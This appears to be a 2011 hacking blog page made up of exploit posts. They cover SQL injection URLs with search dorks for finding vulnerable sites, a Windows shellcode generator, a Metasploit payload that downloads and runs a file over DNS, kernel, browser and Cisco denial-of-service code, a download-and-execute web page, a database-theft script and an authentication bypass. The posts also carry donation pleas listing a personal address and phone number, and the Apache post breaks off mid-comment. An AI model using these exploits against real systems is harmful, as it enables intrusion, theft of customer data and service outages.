Hacking & Research: 2011

Wednesday, June 29, 2011

Rgboard SQL Injection Vulnerability

* Exploit Title: rgboard SQL Injection Vulnerability

* inurl: rgboard4/list.php

* Date: 2011. 6.22

* <script type="text/javascript">

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</script>)

* Test on : Windowss XP SP3

* Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down

* Version: rgboard 4.2.1

* SQL Injection

http://[target]/list.php?bbs_code=notice[SQL]

* POC : http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%
2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C
database()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))
%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23

Friday, May 27, 2011

win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD

win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD

#!/usr/bin/perl
system("cls");
sub logo(){
print q'
 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 
';
}
logo();
###
# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
# Author : Tringle2011
# platform : win32
# Impact : Command Execution / Shellcode maker
# Tested on : Windows XP sp3 
$ARGC=@ARGV;
if ($ARGC!=1) { 
   print "\n [!] Usage: perl $0 [Command] \n\n"; 
   die " [*] f.ex: perl $0 shutdown -s -t 18 \n"; 
}
my $CMD = shift;
my $header = q'
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    
    unsigned char shellcode[]=
';
my $sh = q'
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';
my $end = q'

    printf("Size = %d bytes\n", strlen(shellcode));
 
    ((void (*)())shellcode)();
 
    return 0;
}
';

print $header.$sh.$end;

Download and execute file via reverse DNS channel

Download and execute file via reverse DNS channel

##
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip\
# P.S. Works with  Vista/7/2008
#       do not work in XP/2003 because thre are no IPv6 by default.
#       can work in XP/2003 if IPv6 installed
#       (it is not need to be enabled, just installed)
 
require 'msf/core'
 
module Metasploit3
 
    include Msf::Payload::Windows
    include Msf::Payload::Single
 
    def initialize(info = {})
        super(update_info(info,
            'Name'          => 'DNS_DOWNLOAD_EXEC',
            'Version'       => '0.01',
            'Description'   => 'Download and Exec (via DNS)',
            'Author'        => [ 'Alexey Sintsov' ],
            'License'       => MSF_LICENSE,
            'Platform'      => 'win',
            'Arch'          => ARCH_X86,
            'Payload'       =>
                {
                    'Offsets' =>{ },
                     
                    'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
                     
                    'Payload1' =>            "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
                     
                    'Payload2' =>    "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18" 
                     
                }
            ))
 
        # We use rtlExitThread(0)
        deregister_options('EXITFUNC')
 
        # Register the domain and cmd options
        register_options(
            [
                OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
            ], self.class)
    end
 
    #
    # Constructs the payload
    #
    def generate_stage
        domain  = datastore['DOMAIN'] || ''
        extens  = datastore['FILE'] || 'vbs'
         
        # \"x66\x79\x66\x01"
        extLen=extens.length
         
        while extens.length<4
            extens=extens+"\x01"
        end
         
        i=0
        while i<extLen
            extens[i,1]=(extens[i].ord+1).chr
            i=i+1
        end
         
        while domain.length<10
            domain=domain+"\xFF"
        end
         
        domain="\x2e"+domain
         
        payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
                 
        return payload
    end
 
end

Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit

Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit

#!/usr/bin/python
 
############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
from ctypes import *
 
kernel32 = windll.kernel32
Psapi    = windll.Psapi
 
if __name__ == '__main__':
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2
 
    SYM_NAME   = "\\\\.\\Nsi"
    dwReturn      = c_ulong()
    out_buff      = ''
    in_buff       = ("\x00\x00\x00\x00\x00\x00\x00\x00\xec\x2d\x39\x6e\x07\x00\x00\x00"
                     "\x01\x00\x00\x00\x00\x00\x00\x00\x38\x89\x6c\x01\x08\x00\x00\x00"
                     "\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfa\x78\x00\x28\x00\x00\x00"
                     "\x38\xfa\x78\x00\x0c\x00\x00\x00")
 
    handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
    dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)

HB ECOMMERCE SQL Injection Vulnerability

-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
------------------------------------------------------------------------
------------------------------------------------------------------------
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:'supplied by hb ecommerce'
[+] Date: 26.05.2011
[+] Author: Tringle2011
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
------------------------------------------------------------------------
------------------------------------------------------------------------
vulnerable url:
 
/templates1/view_product.php?product=3D
 
Example:
 
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]
 
Get an Mail from the Customers Table:
 
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=
9a%29%20
 
note: customer passwords dumped in plaintext!

Google Chrome (res://mshtml.dll) Remote Exploit

####
# Exploit Title: Google Chrome (res://mshtml.dll) Remote Exploit
# Author: Tringle2011
# Category:: Remote Exploits
# Tested on: [Windows Vista ]
####



###

[*] Crash :


<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
function boom()
 {
 var longunistring1 = unescape("%u4141%u4141");
 var longunistring2 = unescape("%u4242%u4242");
 var longunistring3 = unescape("%u4343%u4343");
 var longunistring4 = unescape("%u4444%u4444");
 for(i=0; i <= 999 ; ++i) 
 {
  longunistring1+=longunistring1;
  longunistring2+=longunistring2;
  longunistring3+=longunistring3;
  longunistring4+=longunistring4;
  document.write(longunistring1);
  document.write(longunistring2);
  document.write(longunistring3);
  document.write(longunistring4);
 }     
 document.write(longunistring1);
 document.write(longunistring2);
 document.write(longunistring3);
 document.write(longunistring4);
 document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits

Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# Author : Tringle2011
# E-mail : andrew.nile@gmail.com
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on : Windows XP SP3 (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.
-->

#=======[ PoC (1) Buffer Overflow & Crash !]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
function boom()
 {
 var longunistring1 = unescape("%u4141%u4141");
 var longunistring2 = unescape("%u4242%u4242");
 var longunistring3 = unescape("%u4343%u4343");
 var longunistring4 = unescape("%u4444%u4444");
 for(i=0; i <= 999 ; ++i) 
 {
  longunistring1+=longunistring1;
  longunistring2+=longunistring2;
  longunistring3+=longunistring3;
  longunistring4+=longunistring4;
  document.write(longunistring1);
  document.write(longunistring2);
  document.write(longunistring3);
  document.write(longunistring4);
 }     
 document.write(longunistring1);
 document.write(longunistring2);
 document.write(longunistring3);
 document.write(longunistring4);
 document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

#=======[ PoC (2) Download/Exec File]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

# Save Any HTML Code and Use him (Boom !! :D)

Tuesday, May 17, 2011

Video Script ASP Database Disclosure Exploit

HII!!! GUYES NOW A DAYS IT IS VERY HARD TO RELEASE THOSE SECRETS !! WITH OUT ANY MONEY SUPPORT IT IS VERY HARD TO CARRY ON ON SPECIAL PROJECTS !! PLASE HELP ME OUT BY SENDING MONEY AS YOU WISH !! AND PLEACOMMENTS ON THE POSTS !! AND FEEL PROUD TO BE A HACKER !! LOVE YOUR MOTHER LAND AND LEARN AS MUCH POSSIBLE !! HAVE A RED SALUTE !!!!! TAKE CARE GUYES !!!!!




Video Script ASP Database Disclosure Exploit
#!/usr/bin/perl -w
#
# Video Script ASP Database Disclosure Exploit 
#
# Found & Coded: Tringle2011 & indoushka 
# 
# Date: 25/04/2011
#
#
# Download : http://www.scriptmafia.org/
 
 
 
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Video Script ASP Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

($TargetIP, $path, $File,) = @ARGV;

$File="destination/dinimbenim.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/dinimbenim.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/dinimbenim.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}



Video Script ASP Database Disclosure Exploit
#!/usr/bin/perl -w
#
# Video Script ASP Database Disclosure Exploit 
#
# Found & Coded: Tringle2011 & induska & Cyber Sec 
# Date: 25/04/2011
#
# Download : http://www.scriptmafia.org/
 
 
 
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Video Script ASP Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

";
($TargetIP, $path, $File,) = @ARGV;

$File="destination/dinimbenim.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/dinimbenim.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/dinimbenim.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

Onlinetechtools OWOS: Professional Edition Authentication Bypass

HELP US! IF U WANT! SEND US DONATION ON : NAME : INDRANIL BANERJEE ,VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!





Onlinetechtools OWOS: Professional Edition Authentication Bypass
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title: Onlinetechtools OWOS: Professional Edition? Authentication Bypass Vulnerability
Version:2.10
Price:900$
Vendor url:http://www.onlinetechtools.com
Published: 2011-5-02

.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Description:

Work smarter with OWOS: Professional Edition, the web-based help desk solution.
OWOS Pro helps you simplify support requests, e-mail communication, organize planning and scheduling,
and provide powerful access to the information you need. Code: ASP 3.0 & VBScript
?
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability:

*Authentication ByPass Vulnerability*

Pattern: ' or 1=1 or ''=''

DEMO URL :

http://www.onlinetechtools.com/demo/owospro210/login.asp?go=/demo/owospro210/default.asp&id=

.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
# 0day n0 m0re #
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Webworx Technologies Lahore Pakistan PHP & ASP SQL Injection Vulnerability

HELP US!! IF U WANT! SEND US DONATION(MONEY ORDER) ON : NAME : INDRANIL BANERJEE VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!

Webworx Technologies Lahore Pakistan PHP & ASP SQL Injection Vulnerabili

#####################################################################################
# Title : Webworx Technologies Lahore Pakistan PHP & ASP SQL Injection Vulnerability
#
# Author: Tringle2011
#
#
# Email : andrew.nile@gmail.com
#
# date  : 14/05/2011
#
# d0rk:-  "Website Developed By Webworx Technologies Lahore Pakistan"
#        
# category  : Web Apps [SQli PHP & ASP]
#       
####################################################################################
####################################################################################



    Go To Site :-

   
  
    *SQL injection Vulnerability*



      [+][php]

      [+]http://site.com/product.php?ProdCatID=15'
      [+]http://site.com/product.php?ProdCatID=[SQLI]
      [+]http://site.com/ppbdetail.php?CompanyID=15'
      [+]http://site.com/ppbdetail.php?CompanyID=[SQLI]

     [+][ASP]

      [+]http://site.com/detail.asp?ConCatID=112'
    [+]http://site.com/detail.asp?ConCatID=[SQLI]            
      [+]http://site.com/lawnews.asp?newscat=9'
    [+]http://site.com/lawnews.asp?newscat=[SQLI]      
      [+]http://site.com/detail.asp?ComSubCaID=47' 
    [+]http://site.com/detail.asp?ComSubCaID=[SQLI]  
      [+]http://site.com/cricket-board-news.asp?orgtype=16'     
    [+]http://site.com/cricket-board-news.asp?orgtype=[SQLI]   
      [+]http://site.com/news-article-detail.asp?NewsID=71'  
      [+]http://site.com/news-article-detail.asp?NewsID=[SQLI]
  
      [+] mostly all php and asp files like .php?id=[sqli] are vulnerable.!

     => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam

     => c0d3 for motherland, h4ck for motherland


   
    [#] DOne now time to rock \m/

===================================================================
Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c)
===================================================================



/*******************************************************/
/*                                                                                            */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement.                                               */
/*                                                                                            */
/* Please use this code only to check your OWN cisco routers.         */
/*                                                                                            */
/*                                                                                            */
/* This exploit uses the bug in recent IOS versions to stop router    */
/* from processing traffic once the input queue is full.                    */
/*                                                                                            */
/*                                                                                            */
/* Use access control lists as described in the CISCO advisory to     */
/* protect your cisco routers:                                                       */
/*                                                                                            */
/* access-list 101 deny 53 any any                                              */
/* access-list 101 deny 55 any any                                              */
/* access-list 101 deny 77 any any                                              */
/* access-list 101 deny 103 any any                                            */
/*                                                                                            */
/* This code was only tested on linux, no warranty is or will be        */
/*                                                                                            */
/* Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number>  */
/* Source IP: Your source IP (or a spoofed source IP)                    */
/* Destination IP: The IP of the vulnerable cisco router                  */
/* Hops: The number of hops between you and the router,             */
/* the time to live (ttl) should be 0 when the packet                      */
/* is received by the cisco router.                                                 */
/* Number: Number of packets to send (0 = loop)                         */
/* provided.                                                                              */
/*******************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <netinet/in.h>

#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#define DEBUG

#ifndef IPPROTO_RAW
#define IPPROTO_RAW 0
#endif

/* IPv4 header */
struct ipv4_pkt_header {
unsigned int ipvhl:8; /* Version + Header length */
unsigned int type_service:8; /* TOS(Type of Service) field */
unsigned short packet_len; /* Header+Payload length */
unsigned short ident; /* Identification field */
unsigned short fragment; /* Fragment Offset field */
unsigned int time_live:8; /* TTL(Time to Live) field */
unsigned int protocol:8; /* Protocol field */
unsigned short sum; /* Checksum field */
struct in_addr src_ip; /* Source IP */
struct in_addr dst_ip; /* Destination IP */
};


char proto[] = {53,55,77,103};


/* Prototypes */
int in_cksum (unsigned short *, int, int);


/* Main function */
int main (int argc, char *argv[]) {
struct ipv4_pkt_header ipv4_hdr;
struct sockaddr_in sin;
struct timeval seed;

unsigned long src_ip, dst_ip;
int fd, hops, count, bytes;
int len=0, i=0, n=0, loop=0;

unsigned char *buf;

/* Check command line args */ 
if(argc != 5) {
fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
return(EXIT_FAILURE);
}

src_ip = inet_addr(argv[1]);
dst_ip = inet_addr(argv[2]);
hops = atoi(argv[3]);
count = atoi(argv[4]);

if(count == 0) { loop=1; count=1; }

#ifdef DEBUG
printf("DEBUG: Hops: %i\n", hops);
#endif

/* Open a raw socket */
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
fprintf(stderr, "Error: Cannot open raw socket.\n");
return(EXIT_FAILURE);
}

/* Build the IPv4 header */
ipv4_hdr.ipvhl = ((4 << 4) | 0x0f) & (5 | 0xf0); /* :) */
ipv4_hdr.type_service = 0x10;

#ifdef OSTYPE_BSD
ipv4_hdr.packet_len = 0x14 + len;
ipv4_hdr.fragment = 0x4000;
#else
ipv4_hdr.packet_len = htons(0x14 + len);
ipv4_hdr.fragment = htons(0x4000);
#endif

ipv4_hdr.time_live = hops;
ipv4_hdr.src_ip.s_addr = src_ip;
ipv4_hdr.dst_ip.s_addr = dst_ip;

while(n < count) {
/* Seed the random generator */
if(gettimeofday(&seed, NULL) == -1) {
fprintf(stderr, "Error: Cannot seed the random generator.\n");
return(EXIT_FAILURE);
}

srandom((unsigned int) (seed.tv_sec ^ seed.tv_usec));

ipv4_hdr.protocol = proto[random() % 0x4];

#ifdef DEBUG
printf("DEBUG: Protocol: %i\n", ipv4_hdr.protocol);
#endif

ipv4_hdr.ident = htons(random() % 0x7fff);

/* Calculate checksum */
ipv4_hdr.sum = 0x0000;
ipv4_hdr.sum = in_cksum((unsigned short *) &ipv4_hdr, 0x14 + len, 0);

#ifdef DEBUG
printf("DEBUG: Checksum: %i\n", ipv4_hdr.sum);
#endif

buf = malloc(0x14 + len);
memset(buf, '\0', 0x14 + len);

memcpy((unsigned char *) buf, (unsigned char *) &ipv4_hdr,
0x14 + len);

#ifdef DEBUG
printf("DEBUG: ");
for(i=0; i < 0x14 + len; i++)
printf(" %02x", buf[i]);
printf("\n");
#endif


memset(&sin, '\0', sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = dst_ip;

bytes = sendto(fd, buf, 0x14 + len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr));

#ifdef DEBUG
printf("DEBUG: Wrote %i bytes.\n", bytes);
#endif

if(loop != 1) n++;

free(buf);
}

close(fd);
return(EXIT_SUCCESS);
}


int in_cksum(unsigned short *addr, int len, int csum) {
register int sum = csum;
unsigned short answer = 0;
register unsigned short *w = addr;
register int nleft = len;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1) {
sum += htons(*(unsigned char *)w<<8);
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}

Mozilla Products Remote Crash Vulnerability





Mozilla Products Remote Crash Vulnerability<!--PROOF OF CONCEPT
 The vulnerability can be exploited with the following 2 lines of code:
   
  <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
  <script type="text/javascript">window.frames.pocframe.print();</script>
  -->

  <head>
    <title>Mozilla Crash Vulnerability - Proof of Concept</title>
  </head>
  <body>
    <h1>Proof of Concept for Mozilla Crash Vulnerability</h1>
    <h3>Discovered by <a href="mailto:mail[at]niekvandermaas[dot]nl">Niek van der Maas</a>, <a href="http://www.maas-online.nl">MaasOnline</a></h3>
    <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
    <script type="text/javascript">window.frames.pocframe.print();</script>
</body>
</html>

Apache HTTP Server 2.x Memory Leak Exploit

Apache HTTP Server 2.x Memory Leak Exploit

/* apache-massacre.c
* Test code for Apache 2.x Memory Leak
* By Tgingle2011
*
* DISCLAIMER: This exploit tool is provided only to test networks for a
* known vulnerability. Do not use this tool on systems you do not control,
* and do not use this tool on networks you do not own without appropriate
* consent from the network owner. You are responsible for any damage your
* use of the tool causes. In no event may the author of this tool be held
* responsible for damages relating to its use.
*
* As with most Apache exposures, the impacts vary between ports of the server:
*
* Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected
* by this, as Apache's child process doesn't terminate normally unless the
* parent process stops. This means that leaks (and any performance loss) hang
* around until Apache is restarted.
*
* Unix/mpm_prefork: This MPM offers the most protection against successful
* exploitation, as its processes exit at the end of the request.
*
* Unix/other MPMs: These other MPMs utilize multiple Apache processes for
* multiple Apache requests. Depending on the MPM in use and the traffic rates
* of the server, this may be used to the advantage of a potential attacker.
